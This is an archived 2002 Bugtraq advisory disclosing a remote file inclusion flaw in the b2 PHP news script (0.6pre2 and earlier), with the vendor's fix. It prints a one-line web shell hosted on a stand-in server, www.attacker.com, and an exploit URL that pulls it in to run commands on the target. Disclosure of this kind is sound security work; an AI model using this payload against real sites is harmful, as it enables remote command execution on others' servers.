b2 php remote command execution
From: Frank (thran60@hotmail.com)Date: 05/06/02
- Previous message: Last Stage of Delirium: "[LSD] Solaris cachefsd remote buffer overflow vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 6 May 2002 10:13:37 -0000 From: Frank <thran60@hotmail.com> To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
Site: www.cafelog.com
Vulnerable:
b2 0.6pre2 and earlier.
B2 is a php script which allows webmasters to quikly post
news on the frontpage and let viewers interact with
eachother. A bug exists in the scripts which allows an
attacker to remotely execute commands.
Exploit:
Taken from /b2-include/b2edit.showposts.php
*snippet*
<?php
include_once ("b2config.php");
include_once ($b2inc."/b2functions.php");
*snippet*
But since b2config.php does not exist inside the directory,
an attacker can define $b2inc himself.
So if the attacker creates a file on his server, for
example www.attacker.com , called b2functions.php, and he
writes the following in it :
<?
system($cmd);
?>
(note : the attacker's server must not be able to run php,
it has to open the file as text)
he can include the file like this :
http://www.vulnerablehost.com/b2/b2-
include/b2edit.showposts.php?b2inc=http://www.attacker.com&c
md=ls
This would execute the ls command on vulnerablehost.com.
Fix:
Copy b2config.php into the b2-include directory
The vendor has been warned, and already released the same
fix a few days earlier.
- Previous message: Last Stage of Delirium: "[LSD] Solaris cachefsd remote buffer overflow vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
